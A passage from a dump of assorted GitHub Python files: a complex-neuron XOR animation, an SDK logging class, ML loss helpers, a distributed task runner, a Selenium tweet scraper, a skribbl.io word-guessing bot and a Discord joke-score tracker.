('Output: ',o)\n # if o == target:\n # self.tc_passed += 1\n # return z\n\n print ('Modify weights!')\n t_angle = np.array(self.out[target]['target'])\n print ('Target Angles: ', t_angle)\n #t_angle_2complex = complex(np.cos(t_angle) + 1j*np.sin(t_angle))\n\n errors = np.exp(1j * t_angle) - z\n #print ('Errors: ', errors)\n e = errors[np.argmin(np.abs(errors))]\n print ('Error: ', e)\n dw = e * input / 3\n self.w += dw\n print ('Weights: ',self.w)\n \n #query after weight adjustment\n # z1, _ = self.query(in_list[:2])\n # o1, _ = self.map_z(z1)\n # if o1 == target:\n # self.tc_passed += 1\n \n return z, (o, q)\n \n def reset_tc_passed(self):\n self.tc_passed = 0\n\ndef visualize(angle, q, offset=1):\n x = np.cos(angle)\n y = np.sin(angle)\n #ax.scatter(x,y, facecolor='red')\n # xtxt = -1.7\n # ytxt = 1.2 * offset\n xtxt = 0\n ytxt = 0\n offset *= 0.25\n if q[1] == 1: # bottom half of circle\n ytxt = y - offset\n if q[0] == 0:\n xtxt = x - offset\n else:\n xtxt = x + offset\n else: # top half of circle\n ytxt = y + offset\n if q[0] == 1:\n xtxt = x - (offset + 0.25)\n else:\n xtxt = x + offset\n return (x,y), (xtxt, ytxt)\n\n# Initialize neural network\nn_in = 2\ncat = 2\nper = 2\nnn = ComplexNeuron(n_in, cat, per)\n\n# define arrow annotations for raw and learned angle\narrowprops = dict(arrowstyle=\"-|>\",\n color='black',\n shrinkA=5, shrinkB=5,\n patchA=None,\n patchB=None,\n connectionstyle=\"angle,angleA=-90,angleB=180,rad=5\",\n )\nraw_angle = plt.annotate('', xy=(0,0))\nlearned_angle = plt.annotate('', xy=(0,0))\n\n# define Input Texts and Input Data\nbbox = dict(boxstyle=\"square\", fc='w', ec='black')\ntxt_handler = [\n plt.text(-2, 0.6, \"Training Data:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, 0.35, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-1.8, 0, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-2, -0.4, \"Target Output:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, -0.65, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace')]\n\nTrain_d = [\n ['Train',[-1, -1], 0],\n ['Train',[-1, 1], 1],\n ['Train',[ 1, -1], 1],\n ['Train',[ 1, 1], 0],\n ['Query',[-1, -1]],\n ['Query',[-1, 1]],\n ['Query',[ 1, -1]],\n ['Query',[ 1, 1]]\n]\ncnt = 0\nt_len = len(Train_d)\ntest = False\nlearned_point, = ax.plot([], [], 'ro')\nraw_point, = ax.plot([], [], 'ro')\ndef updatefig(data):\n global txt_handler, nn, Train_d, cnt, t_len, raw_angle, learned_angle, test, arrowprops, learned_point, raw_point\n bbox = dict(boxstyle=\"square\", fc='w', ec='black')\n bbox_r = dict(boxstyle=\"square\", fc='red', ec='black')\n bbox_g = dict(boxstyle=\"square\", fc='green', ec='black')\n\n if Train_d[cnt][0] == 'Train':\n if test:\n print ('Data: ', Train_d[cnt][1])\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set and show learned angle and point\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n test = False\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n\n return [*txt_handler, learned_angle , raw_angle, learned_point, raw_point]\n else:\n z, q = nn.train(Train_d[cnt][1], Train_d[cnt][2])\n xy, xytxt = visualize(np.angle(z), q, -1.2)\n # set raw angle and point\n raw_point.set_data(xy)\n raw_point.set_visible(True)\n raw_angle = plt.annotate('Raw Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gray'), arrowprops=arrowprops)\n \n # set input texts\n txt_handler[0].set_text('Training Data')\n txt_handler[3].set_text('Target Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n # hide learned angle and point\n learned_angle.remove()\n learned_point.set_visible(False)\n test = True\n\n return [*txt_handler, raw_angle, learned_point, raw_point]\n else:\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set learned angle\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n # set input texts\n txt_handler[0].set_text('After Training')\n txt_handler[3].set_text('Learned Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n txt_handler[4].set_bbox(bbox)\n \n # hide raw angle\n raw_angle.set_visible(False)\n raw_point.set_visible(False)\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n \n return [*txt_handler, learned_angle, learned_point, raw_point]\n\nani = animation.FuncAnimation(fig, updatefig, interval=3000, blit=True, repeat=False)\n#ani.save(\"single_neuron.mp4\")\nplt.show()","repo_name":"ey3lock3r/Complex-Valued-NN","sub_path":"complex_neuron_v2.py","file_name":"complex_neuron_v2.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37079550432","text":"import logging\nimport os\nimport platform\n\nfrom cuvis_il import cuvis_il\nfrom .cuvis_aux import SDKException\nfrom .cuvis_types import ComponentType\n\nimport cuvis.cuvis_types as internal\n\nfrom dataclasses import dataclass\n\nclass General(object):\n def __init__(self, path=\"\"):\n log_path = \".\"\n FORMAT = '%(asctime)s -- %(levelname)s: %(message)s'\n if os.path.exists(path):\n log_path = path + os.sep\n elif platform.system() == \"Linux\":\n log_path = os.path.expanduser('~') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n elif platform.system() == \"Windows\":\n log_path = os.getenv('APPDATA') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n \n if os.path.exists(log_path):\n logging.basicConfig(filename=log_path + \"cuvisSDK_python.log\",\n format=FORMAT,\n encoding='utf-8',\n level=logging.DEBUG,\n filemode='w')\n else:\n raise SDKException(\n \"path {} does not exist...\".format(os.path.abspath(log_path)))\n logging.info(\"Logger ready.\")\n\n if cuvis_il.status_ok != cuvis_il.cuvis_init(log_path):\n raise SDKException()\n pass\n\n @property\n def version(self) -> str:\n return cuvis_il.cuvis_version_swig()\n\n def set_log_level(self, lvl):\n lvl_dict = {\"info\": {\"cuvis\": cuvis_il.loglevel_info,\n \"logging\": logging.INFO},\n \"debug\": {\"cuvis\": cuvis_il.loglevel_debug,\n \"logging\": logging.DEBUG},\n \"error\": {\"cuvis\": cuvis_il.loglevel_error,\n \"logging\": logging.ERROR},\n \"fatal\": {\"cuvis\": cuvis_il.loglevel_fatal,\n \"logging\": logging.CRITICAL},\n \"warning\": {\"cuvis\": cuvis_il.loglevel_warning,\n \"logging\": logging.WARNING},\n }\n\n cuvis_il.cuvis_set_log_level(lvl_dict[lvl][\"cuvis\"])\n logging.basicConfig(level=lvl_dict[lvl][\"logging\"])\n\n\n@dataclass\nclass ComponentInfo(object):\n type: ComponentType = None\n display_name: str = None\n sensor_info: str = None\n user_field: str = None\n pixel_format: str = None\n\n def _get_internal(self):\n ci = cuvis_il.cuvis_component_info_t()\n ci.type = internal.__CuvisComponentType__[self.type]\n ci.displayname = self.display_name\n ci.sensorinfo = self.sensor_info\n ci.userfield = self.user_field\n ci.pixelformat = self.pixel_format\n return ci\n \n @classmethod\n def _from_internal(cls, ci):\n return cls(type=internal.__ComponentType__[ci.type],\n display_name=ci.displayname,\n sensor_info=ci.sensorinfo,\n user_field=ci.userfield,\n pixel_format=ci.pixelformat)\n","repo_name":"cubert-hyperspectral/cuvis.python","sub_path":"cuvis/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39268298588","text":"import logging as log\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\ndef get_irreducable_losses_complete(dataloader, small_model):\n log.info('Calculating irreducible losses')\n irr_losses = []\n with torch.inference_mode():\n for idx, (data, target) in enumerate(dataloader):\n irr_losses.append(compute_irreducable_loss_batch(data, target, small_model))\n return irr_losses\n\n\ndef compute_irreducable_loss_batch(data, target, small_model):\n output = small_model(data)\n if str(type(output)) == \"\":\n output = output.logits\n return F.cross_entropy(\n output, target, reduction=\"none\"\n )\n\n\ndef compute_reducable_loss_batch(large_model: nn.Module, small_model: nn.Module, data, target):\n with torch.inference_mode():\n logits = large_model(data)\n if str(type(logits)) == \"\":\n logits = logits.logits\n model_loss = F.cross_entropy(logits, target, reduction=\"none\")\n irreducible_loss = compute_irreducable_loss_batch(data, target, small_model)\n reducible_loss = model_loss - irreducible_loss\n\n return model_loss, reducible_loss\n","repo_name":"TNJKvm/stood-over-june","sub_path":"src/utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34594477388","text":"\"\"\"\ntasq.remote.runner.py\n~~~~~~~~~~~~~~~~~~~~~\nRunner process, listening for incoming connections to schedule tasks to a pool\nof worker actors\n\"\"\"\nimport os\nimport asyncio\nfrom multiprocessing import Process, cpu_count\n\nimport tasq.worker as worker\nimport tasq.actors as actors\nfrom .backend import ZMQBackend\nfrom .connection import connect_redis_backend, connect_rabbitmq_backend\nfrom ..logger import get_logger\n\n\ndef max_workers():\n return (cpu_count() * 2) + 1\n\n\nclass Runner:\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._run = False\n self._unpickle = unpickle\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n\n def _respond(self, fut):\n self._backend.send_result(fut.result())\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n # Stop server connection\n self._run = False\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._run = True\n self._log.debug(\"Listening on %s\", self._backend)\n self.run()\n\n def run(self):\n while self._run:\n job = self._backend.recv(5, unpickle=self._unpickle)\n if not job:\n continue\n self._log.debug(\"Received job: %s\", job)\n fut = self._workers.route(job)\n fut.add_done_callback(self._respond)\n\n\nclass ZMQRunner:\n \"\"\"Runner process, handle requests asynchronously from clients and\n delegate processing of incoming tasks to worker processes, responses are\n sent back to clients by using a dedicated thread\n \"\"\"\n\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._unpickle = unpickle\n self._run = False\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n self._loop = asyncio.get_event_loop()\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n self._run = False\n # Cancel pending tasks (opt)\n for task in asyncio.Task.all_tasks():\n task.cancel()\n self._loop.stop()\n self._loop.close()\n # Stop server connection\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._backend.bind()\n self._run = True\n self._log.info(self._backend)\n self._loop.create_task(self.run())\n self._loop.run_forever()\n\n async def run(self):\n while self._run:\n try:\n if await self._backend.poll():\n job = await self._backend.recv(unpickle=self._unpickle)\n self._log.debug(\"Received job: %s\", job)\n f = self._workers.route(job)\n fut = asyncio.wrap_future(f)\n await self._backend.send(await fut)\n except asyncio.CancelledError:\n pass\n\n\nclass Runners:\n\n \"\"\"Class to handle a pool of runners on the same node\"\"\"\n\n def __init__(self, binds, signkey=None, unix_socket=False):\n # List of tuples (host, pport, pull_port) to bind to\n self._binds = binds\n # Digital sign data before send an receive it\n self._signkey = signkey\n # Unix socket flag, if set to true, unix sockets for interprocess\n # communication will be used and ports will be used to differentiate\n # push and pull channel\n self._unix_socket = unix_socket\n # Processes, equals the len of `binds`\n self._procs = []\n self._init_binds()\n\n def _serve_runner(self, host, psh_port, pl_port):\n pass\n # m = ZMQActorRunner(\n # host,\n # psh_port,\n # pl_port,\n # signkey=self._signkey,\n # unix_socket=self._unix_socket,\n # )\n # m.start()\n\n def _init_binds(self):\n self._procs = [\n Process(target=self._serve_runner, args=(host, psh_port, pl_port,))\n for host, psh_port, pl_port in self._binds\n ]\n\n def start_procs(self):\n for proc in self._procs:\n proc.start()\n try:\n for proc in self._procs:\n proc.join()\n except KeyboardInterrupt:\n # Clean up should be placed\n pass\n\n\nclass RunnerFactory:\n def __init__(self):\n self._builders = {}\n\n def register_builder(self, key, builder):\n self._builders[key] = builder\n\n def create(self, key, **kwargs):\n builder = self._builders.get(key)\n if not builder:\n raise ValueError(key)\n return builder(**kwargs)\n\n\ndef build_zmq_actor_runner(\n host,\n channel,\n router_class=actors.RoundRobinRouter,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=True,\n):\n push, pull = channel\n ctx = actors.get_actorsystem(f\"{host}:({push}, {pull})\")\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n unpickle,\n signkey,\n )\n\n\ndef build_zmq_queue_runner(\n host,\n channel,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=False,\n):\n push, pull = channel\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server, lambda: worker.build_jobqueue(num_workers), unpickle, signkey\n )\n\n\ndef build_redis_actor_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_redis_queue_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\ndef build_rabbitmq_actor_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_rabbitmq_queue_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\nrunner_factory = RunnerFactory()\nrunner_factory.register_builder(\"ZMQ_ACTOR_RUNNER\", build_zmq_actor_runner)\nrunner_factory.register_builder(\"ZMQ_QUEUE_RUNNER\", build_zmq_queue_runner)\nrunner_factory.register_builder(\"REDIS_QUEUE_RUNNER\", build_redis_queue_runner)\nrunner_factory.register_builder(\"REDIS_ACTOR_RUNNER\", build_redis_actor_runner)\nrunner_factory.register_builder(\n \"AMQP_QUEUE_RUNNER\", build_rabbitmq_queue_runner\n)\nrunner_factory.register_builder(\n \"AMQP_ACTOR_RUNNER\", build_rabbitmq_actor_runner\n)\n","repo_name":"codepr/tasq","sub_path":"tasq/remote/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"53"} +{"seq_id":"7073235269","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib.parse\nimport datetime as dt\n\"\"\"\nneeds.py는 키워드를 선택, url검색, 키워드 검색 시 날짜구분에 이용됨\n\"\"\"\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"DBP.settings\")\nimport django\ndjango.setup()\nfrom App.models import Data\n\nclass TwitterCrawling():\n keyword = \"\"\n\n def __init__(self):\n self.url1 = \"https://twitter.com/search?f=tweets&vertical=default&q=\"\n #self.url2 = urllib.parse.quote_plus(\", \".join(self.keyword))\n self.s_date = dt.date(year=2018, month=11, day=30)\n self.e_date = dt.date(year=2018, month=12, day=1)\n\n def InputKeyword(self, word):\n print(\"트위터에서 검색될 키워드 : \")\n self.keyword = word\n print(\"\\\"\" + self.keyword + \"\\\"\")\n return self.connect_chrome()\n\n def connect_chrome(self):\n print(\"Connecting chrome to tweet !\")\n self.url = str(self.url1 + self.keyword)\n\n # 드라이버 연결(Chrome)\n self.driver = webdriver.Chrome('C:/Users/User/Desktop/chromedriver.exe')\n # 암묵적으로 웹 자원 로드를 위해 2초까지 기다린다\n self.driver.implicitly_wait(2)\n\n # BeautifulSoup를 이용한 html 스크래핑\n self.driver.get(self.url + '%20since%3A' + str(self.s_date) + '%20until%3A' + str(self.e_date) + '&amp;amp;amp;amp;amp;lang=ko')\n self.html = self.driver.page_source\n self.soup = BeautifulSoup(self.html, 'html.parser')\n\n return self.parse_twitter_text()\n\n def parse_twitter_text(self):\n print(\"Parsing tweet text !(max = 20)\")\n # 내용 파싱(추출)\n lists = self.soup.find_all(\"p\", {\"class\": \"TweetTextSize\"})\n data_title = {}\n\n # 보여짐\n for i in lists:\n data_title[i.text] = i.text\n self.driver.quit()\n return data_title\n","repo_name":"JinMinChoi/DB_Project","sub_path":"DBP/first_tweet_new.py","file_name":"first_tweet_new.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19435041462","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport os\nimport time\nimport sys\nfrom threading import Thread\n\ndef try_word(word, known):\n try:\n if len(word) != len(known):\n raise ValueError(\"Word and known aren't the same length!\")\n x = 0\n for char in known:\n if word[x] == char or char == \"*\":\n if x == len(word) - 1:\n elem = driver.find_element_by_id(\"inputChat\")\n elem.clear()\n elem.send_keys(word) \n elem.send_keys(Keys.ENTER)\n time.sleep(1)\n else: \n x += 1\n continue\n else:\n break\n except Exception as e:\n print(e)\n\ndef get_words():\n method = input(\"1: Read words from file | 2: Enter words comma seperated | 3: Use words.txt >\")\n if method == \"1\":\n with open(input(\"Filename >\"), \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n elif method == \"2\":\t\n words = input(\"Enter the words seperatet by \\\",\\\" (no space):\")\n words = words.split(\",\")\n return words\n elif method == \"3\":\n with open(\"words.txt\", \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n else: \n print(\"Invalid input!\")\n return get_words()\n\ndef sort_words(words):\n longest = 0\n for word in words:\n if len(word) > longest:\n longest = len(word)\n all_words = {}\n for leng in range(longest):\n current_words = []\n for word in words:\n if len(word) == leng:\n current_words.append(word)\n all_words[leng] = current_words\n return all_words\n\ndef get_current_word():\n elem = driver.find_element_by_id(\"currentWord\")\n return elem.text\n\ndef get_player():\n players = driver.find_elements_by_class_name(\"player\")\n for player in players:\n info = player.find_elements_by_class_name(\"info\")\n nameElem = info[0].find_elements_by_class_name(\"name\")\n name = nameElem[0].text\n if \"(You)\" in name:\n return player\n\ndef clear_screen():\n # for windows\n if os.name == 'nt':\n _ = os.system('cls')\n # for mac and linux(here, os.name is 'posix')\n else:\n _ = os.system('clear')\n\ndef handleInput():\n global cmd\n global should_print\n global auto\n global clear\n\n while True:\n time.sleep(1)\n inp = input(\"\")\n if inp == \"len\":\n should_print = False\n leng = input(\"Enter the new length >\")\n should_print = True\n cmd = \"len \" + leng\n elif inp == \"quit\":\n cmd = \"quit\"\n sys.exit()\n elif inp == \"known\":\n should_print = False\n known = input(\"Enter what you know >\")\n should_print = True\n cmd = \"known \" + known\n elif inp == \"done\":\n cmd = \"done\"\n elif inp == \"auto\":\n auto = not auto\n elif inp == \"clear\":\n clear = not clear\n else:\n should_print = False\n if auto:\n print(\"Unknown command\\nUse one of these: len quit known done auto clear\")\n else:\n print(\"Unknown command\\nUse one of these: quit auto clear\")\n time.sleep(1)\n should_print = True\n\ndef run():\n global cmd\n global should_print\n global auto\n global done\n global clear\n player = None\n known = \"\"\n leng = 0\n\n while True:\n if leng == 0 and not auto:\n leng = input(\"Enter the length >\")\n known = \"*\" * int(leng)\n elif leng == 0:\n known = get_current_word().replace(\"_\", \"*\")\n leng = len(known)\n\n if player == None:\n player = get_player()\n\n current = 0\n list_len = len(words[int(leng)])\n\n for word in words[int(leng)]:\n current += 1\n\n if auto:\n if player.get_attribute(\"class\") == \"player guessedWord\" and not done:\n cmd = \"done\"\n temp = known\n known = get_current_word().replace(\"_\", \"*\")\n temp2 = leng\n leng = len(known)\n if len(known.replace(\"*\", \"\")) < len(temp.replace(\"*\", \"\")) or temp2 != leng:\n print(\"New word detected, restarting with length \" + str(leng))\n done = False\n break\n\n if cmd != \"\":\n if \"len \" in cmd:\n leng = int(cmd.replace(\"len \", \"\"))\n known = \"*\" * int(leng)\n print(\"Length set successfully\")\n cmd = \"\"\n break\n\n elif cmd == \"quit\":\n sys.exit()\n\n elif \"known\" in cmd:\n known = cmd.replace(\"known \", \"\")\n print(\"Set known to: \" + known)\n cmd = \"\"\n\n elif cmd == \"done\":\n if not auto:\n leng = 0\n else:\n done = True\n print(\"Word found: '\" + lastWord + \"', waiting for it to change...\")\n cmd = \"\"\n break\n\n if should_print and not done:\n if clear:\n clear_screen()\n percent = int(current * 100 / list_len)\n percent_string = \"[ \" + \" \" * (3 - len(str(percent))) + \"\" + str(percent) + \"% ]\"\n progress_bar_string = \"[\" + \"#\" * int(percent / 10) + \" \" * int(10 - int(percent / 10)) + \"]\"\n count_string = \"[ \" + \" \" * (len(str(list_len)) - len(str(current))) + \"\" + str(current) + \" / \" + str(list_len) + \" ]: \" \n print(percent_string + progress_bar_string + count_string + word)\n\n if not done:\n lastWord = word\n try_word(word, known)\n\n if not auto:\n leng = 0\n\ncmd = \"\"\nshould_print = True\nauto = input(\"Start with auto mode? True | False >\")\ndone = False\nclear = False\nwhile (not auto == \"True\") and (not auto == \"False\"):\n auto = input(\"Invalid input. True | False >\")\nwords = sort_words(get_words())\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\noptions.add_argument(\"--disable-extensions\")\ndriver = webdriver.Chrome(\".\\chromedriver.exe\", options=options)\ndriver.get(\"https://skribbl.io\")\n\ninput_thread = Thread(target=handleInput)\nrun_thread = Thread(target=run)\n\ninput_thread.start()\nrun_thread.start()","repo_name":"GaviTSRA/TSR-Website-Preview","sub_path":"software/skribblbot.py","file_name":"skribblbot.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38845449417","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n\r\nDEFAULT_PATH = \"score_tracker.dat\"\r\nMIN_SCORE = -10\r\nMAX_SCORE = 10\r\n\r\n\r\nclass ScoreTracker(commands.Cog):\r\n \"\"\"\r\n Track T4g1 scores on jokes, provide its current average score as well as\r\n useful statistics\r\n \"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.tracker_user = None\r\n self.history = pd.DataFrame()\r\n self.fix_time = timedelta(\r\n minutes=int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n )\r\n\r\n self.load()\r\n\r\n def test(self):\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_USER\") is None\r\n ), \"SCORE_TRACKER_USER is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_TARGET\") is None\r\n ), \"SCORE_TRACKER_TARGET is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_FIX_TIME\") is None\r\n ), \"SCORE_TRACKER_FIX_TIME is not defined\"\r\n\r\n try:\r\n _ = int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n except Exception:\r\n self.fail(\"SCORE_TRACKER_FIX_TIME is not a proper integer\")\r\n\r\n def add_score(self, score):\r\n \"\"\"Adds the given score into the data\r\n Expect a sanitized score\r\n \"\"\"\r\n index = len(self.history)\r\n data = self.history.to_dict()\r\n data[\"date\"][index] = datetime.utcnow()\r\n data[\"score\"][index] = score\r\n\r\n print(\"T4g1 got a new score: {}\".format(score))\r\n\r\n self.history = pd.DataFrame.from_dict(data)\r\n\r\n self.persist()\r\n\r\n def remove_last(self):\r\n self.history = self.history[-1]\r\n\r\n self.persist()\r\n\r\n print(\"Score tracker entry removed\")\r\n\r\n def load(self):\r\n \"\"\"Load persisted data from disk\"\"\"\r\n try:\r\n self.history = pd.read_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH),\r\n parse_dates=[\"date\"],\r\n )\r\n except FileNotFoundError:\r\n pass\r\n\r\n if len(self.history) == 0:\r\n self.history = pd.DataFrame.from_dict({\"date\": [], \"score\": []})\r\n\r\n self.history.set_index(\"date\")\r\n\r\n print(\"Loaded {} tracking data\".format(len(self.history)))\r\n\r\n def persist(self):\r\n \"\"\"Persist data on disk\"\"\"\r\n self.history.to_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH), index=False\r\n )\r\n\r\n def is_in_range(self, value):\r\n \"\"\"Tells if the value is in range\"\"\"\r\n return value >= MIN_SCORE and value <= MAX_SCORE\r\n\r\n async def is_tracker_user(ctx):\r\n return ctx.author == ctx.cog.tracker_user\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n tracker_user_name = os.getenv(\"SCORE_TRACKER_USER\", default=\"\")\r\n self.tracker_user = self.bot.get_guild().get_member_named(\r\n tracker_user_name\r\n )\r\n\r\n tracker_target_name = os.getenv(\"SCORE_TRACKER_TARGET\", default=\"\")\r\n self.tracker_target = self.bot.get_guild().get_member_named(\r\n tracker_target_name\r\n )\r\n\r\n assert (\r\n self.tracker_user\r\n ), \"The privilegied user was not found, check configuration\"\r\n\r\n @commands.command(name=\"savg\")\r\n async def average(self, ctx):\r\n \"\"\"Displays score tracker average score\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\r\n \"No score given yet, can't average the void yet\"\r\n )\r\n\r\n avg = self.history[\"score\"].sum() / len(self.history)\r\n\r\n await ctx.send(\"Average score: {:.2f}\".format(avg))\r\n\r\n print(\"Giving score tracking average\")\r\n\r\n @commands.command(name=\"sstats\")\r\n async def stats(self, ctx):\r\n \"\"\"Displays score tracker stats\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"No score given yet, can't stat the void yet\")\r\n\r\n df = self.history\r\n\r\n first_of_month = datetime.utcnow().date().replace(day=1)\r\n first_of_month = datetime.combine(first_of_month, datetime.min.time())\r\n\r\n first_of_year = datetime.utcnow().date().replace(month=1, day=1)\r\n first_of_year = datetime.combine(first_of_year, datetime.min.time())\r\n\r\n this_week = df[\"date\"] >= datetime.utcnow() - timedelta(weeks=1)\r\n this_month = df[\"date\"] >= first_of_month\r\n this_year = df[\"date\"] >= first_of_year\r\n\r\n avg_week = df[this_week][\"score\"].sum() / len(df[this_week])\r\n avg_month = df[this_month][\"score\"].sum() / len(df[this_month])\r\n avg_year = df[this_year][\"score\"].sum() / len(df[this_year])\r\n\r\n await ctx.send(\r\n \"Average this week: {:.2f} month: {:.2f} year: {:.2f}\\n\"\r\n \"This week: max: {}, min: {}\\n\"\r\n \"This month: max: {}, min: {}\\n\"\r\n \"All time: max: {}, min: {}\".format(\r\n avg_week,\r\n avg_month,\r\n avg_year,\r\n df[this_week][\"score\"].max(),\r\n df[this_week][\"score\"].min(),\r\n df[this_month][\"score\"].max(),\r\n df[this_month][\"score\"].min(),\r\n df[\"score\"].max(),\r\n df[\"score\"].min(),\r\n )\r\n )\r\n\r\n print(\"Giving score tracking stats\")\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def score(self, ctx, score: int):\r\n \"\"\"[score]/-[score]: Add/remove score\"\"\"\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n self.add_score(score)\r\n\r\n if score > 0:\r\n await ctx.send(\"GG {}!\".format(self.tracker_target.mention))\r\n elif score == 0:\r\n await ctx.send(\"Coucou {}!\".format(self.tracker_target.mention))\r\n else:\r\n await ctx.send(\"It's bad 